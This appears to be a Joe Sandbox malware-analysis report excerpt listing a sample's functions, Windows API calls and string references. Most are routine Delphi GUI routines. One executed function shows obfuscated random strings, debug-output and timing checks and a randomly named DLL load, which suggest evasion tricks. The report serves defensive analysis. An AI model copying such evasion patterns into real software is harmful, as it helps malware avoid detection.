Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0040AB58, Relevance: 6.1, APIs: 4, Instructions: 95

APIs

GetThreadLocale.KERNEL32 ref: 0040AB82
GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
GetSystemMetrics.USER32(0000004A), ref: 0040AC77
GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040AAE0: GetCPInfo.KERNEL32(00000000,?), ref: 0040AAF9

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00423004, Relevance: 6.1, APIs: 4, Instructions: 83

APIs

Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F70C
Part of subcall function 0041F704: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F719
Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00000038,00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F722

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

CreateCompatibleDC.GDI32(00000000), ref: 00423059
SelectObject.GDI32(00000000,?), ref: 00423072
SelectPalette.GDI32(00000000,?,000000FF), ref: 0042309B
RealizePalette.GDI32(00000000), ref: 004230A7

Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00000038,00000000,0041E1BE,0041E1D4), ref: 0041F947
Part of subcall function 0041F940: RtlEnterCriticalSection.KERNEL32(00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F951
Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F95E

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0044A86C, Relevance: 6.1, APIs: 4, Instructions: 72

APIs

GetMenuState.USER32(?,?,?), ref: 0044A88F
GetSubMenu.USER32(?,?), ref: 0044A89A
GetMenuItemID.USER32(?,?), ref: 0044A8B3
GetMenuStringA.USER32(?,?,?,?,?), ref: 0044A906

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00422214, Relevance: 6.1, APIs: 4, Instructions: 64

APIs

SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422242
RealizePalette.GDI32(00000000), ref: 00422251
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 00422283
SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422297

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00455CF4, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnumWindows.USER32(00455C84), ref: 00455D29
GetWindow.USER32(00000003,00000003), ref: 00455D41
GetWindowLongA.USER32(00000000,000000EC), ref: 00455D4E
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00455D8D

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004167E4, Relevance: 6.1, APIs: 4, Instructions: 51

APIs

FindResourceA.KERNEL32(?,?,?), ref: 004167FB
LoadResource.KERNEL32(?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416815
SizeofResource.KERNEL32(?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 0041682F
LockResource.KERNEL32(004160B0,00000000,?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416839

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00431A90, Relevance: 6.0, APIs: 4, Instructions: 46

APIs

Part of subcall function 004314DC: WinHelpA.USER32(00000000,004314F4,00000002,00000000), ref: 004314EB

GetTickCount.KERNEL32(00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431AAE
Sleep.KERNEL32(00000000,00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431AB7
GetTickCount.KERNEL32(00000000,00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431ABC
WinHelpA.USER32(00000000,?,?,00000000), ref: 00431AF2

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00455610, Relevance: 6.0, APIs: 4, Instructions: 34

APIs

GetCurrentThreadId.KERNEL32 ref: 00455628
SetWindowsHookExA.USER32(00000003,004555CC,00000000,00000000), ref: 00455638
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00455653
CreateThread.KERNEL32(00000000,000003E8,00455570,00000000,00000000), ref: 00455677

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004259D0, Relevance: 6.0, APIs: 4, Instructions: 29

APIs

GetDC.USER32(00000000), ref: 004259D9
SelectObject.GDI32(00000000,018A002E), ref: 004259EB
GetTextMetricsA.GDI32(00000000), ref: 004259F6
ReleaseDC.USER32(00000000,00000000), ref: 00425A06

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004238C8, Relevance: 6.0, APIs: 4, Instructions: 27

APIs

DeleteObject.GDI32(?), ref: 004238CC
DeleteDC.GDI32(?), ref: 004238EC
ReleaseDC.USER32(00000000,?), ref: 004238F7
GetObjectA.GDI32(?,00000054,?), ref: 0042390C

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00407090, Relevance: 6.0, APIs: 4, Instructions: 11

APIs

GlobalHandle.KERNEL32 ref: 00407093
GlobalUnlock.KERNEL32(00000000), ref: 0040709A
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040709F
GlobalLock.KERNEL32(00000000), ref: 004070A5

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0041EAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123

APIs

Part of subcall function 0041DE34: RtlEnterCriticalSection.KERNEL32(?,0041DE71), ref: 0041DE38

Part of subcall function 004083B8: CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,0041EB86,00000000,0041EC11,?,00000000,0041EC39), ref: 004083E5

CreateFontIndirectA.GDI32(?), ref: 0041EBEE

Part of subcall function 0041DE40: RtlLeaveCriticalSection.KERNEL32(-00000008,0041DF1F,0041DF27), ref: 0041DE44

Strings

Default, xrefs: 0041EB7C
MS Sans Serif, xrefs: 0041EB8D

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043B13C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111

APIs

Part of subcall function 0043B0A8: GetCapture.USER32 ref: 0043B0BB

DefWindowProcA.USER32(00000000,?,?,?), ref: 0043B243
GetCapture.USER32 ref: 0043B260

Part of subcall function 00438204: GetKeyboardState.USER32(?), ref: 0043833C

Strings

, xrefs: 0043B1B2

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0044A0F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

GetKeyState.USER32(00000010), ref: 0044A114
GetKeyState.USER32(00000011), ref: 0044A126

Strings

, xrefs: 0044A136

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00425A7B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6
RtlEnterCriticalSection.KERNEL32(?,00425B74), ref: 00425B48

Strings

V, xrefs: 00425A7C

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004245E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72

APIs

RtlEnterCriticalSection.KERNEL32(00464A44), ref: 00424683
RtlLeaveCriticalSection.KERNEL32(00464A44,004246CE,00464A44), ref: 004246C1

Strings

DJF, xrefs: 0042462E

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043734C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56

APIs

IntersectRect.USER32(?,?,?), ref: 004373AC
EqualRect.USER32(?,?), ref: 004373BC

Strings

@, xrefs: 0043738D

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043F09C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43

APIs

Part of subcall function 0043F100: 6D3D5FAE.COMCTL32(?,00000000,0043F0C5,00000000,00000000,00000000), ref: 0043F118

Part of subcall function 0043EE8C: ClientToScreen.USER32(?,0043F148), ref: 0043EEA4
Part of subcall function 0043EE8C: GetWindowRect.USER32(?,?), ref: 0043EEAE

6D3D5F55.COMCTL32(?,?,LPC,?,00000000,00000000,00000000), ref: 0043F0E7

Strings

LPC, xrefs: 0043F0DB, 0043F0DE
LPC, xrefs: 0043F0CE

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004264FC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43

APIs

GetSystemMetrics.USER32(00000000), ref: 0042654D
GetSystemMetrics.USER32(00000001), ref: 00426559

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromRect, xrefs: 00426511

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00425A14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21

Part of subcall function 004259D0: GetDC.USER32(00000000), ref: 004259D9
Part of subcall function 004259D0: SelectObject.GDI32(00000000,018A002E), ref: 004259EB
Part of subcall function 004259D0: GetTextMetricsA.GDI32(00000000), ref: 004259F6
Part of subcall function 004259D0: ReleaseDC.USER32(00000000,00000000), ref: 00425A06

MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Strings

MS Sans Serif, xrefs: 00425A4A

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004306E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30

APIs

GetParent.USER32(00000000), ref: 0043070D
SendMessageA.USER32(00000000,00000000,00000465,00000105), ref: 00430713

Strings

hKF, xrefs: 004306EC

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00434D54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19

APIs

WindowFromPoint.USER32(=LC,?), ref: 00434D5A

Part of subcall function 00434D0C: GlobalFindAtomA.KERNEL32(00000000), ref: 00434D20
Part of subcall function 00434D0C: GetPropA.USER32(00000000,00000000), ref: 00434D37

GetParent.USER32(00000000), ref: 00434D71

Strings

=LC, xrefs: 00434D58

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Analysis Process: FB_390E.tmp.exe PID: 3424 Parent PID: 3388

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0.5%
Signature Coverage:	24.1%
Total number of Nodes:	419
Total number of Limit Nodes:	9

Executed Functions

Function 0045B93C, Relevance: 45.6, APIs: 18, Strings: 8, Instructions: 82

APIs

GetForegroundWindow.USER32 ref: 0045B95E
Sleep.KERNEL32(00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B967
GetForegroundWindow.USER32 ref: 0045B96C
OutputDebugStringA.KERNEL32(00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B98A
OutputDebugStringA.KERNEL32(w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B998
GetMessageTime.USER32 ref: 0045B99D
GetWinMetaFileBits.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 0045B9AC
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B9B3
GetTickCount.KERNEL32(00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B9BA
LoadLibraryA.KERNEL32(AXLzZmdD9HtbQccvaUl8.dll), ref: 0045B9D2
FindAtomA.KERNEL32(RkLNPKJEBsQUb), ref: 0045B9E5

Part of subcall function 0045B894: GetConsoleCP.KERNEL32 ref: 0045B898
Part of subcall function 0045B894: GetVersion.KERNEL32 ref: 0045B8AF
Part of subcall function 0045B894: OutputDebugStringA.KERNEL32(XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH), ref: 0045B8BE

FindAtomA.KERNEL32(zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ), ref: 0045B9F4
FindAtomA.KERNEL32(XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc), ref: 0045B9FE
GetTickCount.KERNEL32(XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F), ref: 0045BA03
GetModuleHandleA.KERNEL32(00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000), ref: 0045BA0F
LoadCursorA.USER32(00000000,00000000), ref: 0045BA15
GetTickCount.KERNEL32(00000000,00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064), ref: 0045BA1A
lstrlen.KERNEL32(nrv3Luf0WuUHwt0zdItIqYOEpuqSh,00000000,00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000), ref: 0045BA24

Strings

w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS, xrefs: 0045B993
LUfdbTx4Qp0PQTLTD, xrefs: 0045BA08
nrv3Luf0WuUHwt0zdItIqYOEpuqSh, xrefs: 0045BA1F
RkLNPKJEBsQUb, xrefs: 0045B9E0
AXLzZmdD9HtbQccvaUl8.dll, xrefs: 0045B9CD
XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc, xrefs: 0045B9F9
W, xrefs: 0045B9DB
zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ, xrefs: 0045B9EF

Memory Dump Source

Source File: 00000007.00000002.249005285.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.248949459.00400000.00000002.sdmp
Associated: 00000007.00000002.249162850.0045C000.00000004.sdmp
Associated: 00000007.00000002.249212730.0045D000.00000008.sdmp
Associated: 00000007.00000002.249327852.00464000.00000004.sdmp
Associated: 00000007.00000002.249338317.00466000.00000008.sdmp
Associated: 00000007.00000002.249464094.00468000.00000004.sdmp
Associated: 00000007.00000002.249477214.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_FB_390E.jbxd

Function 00405B44, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA

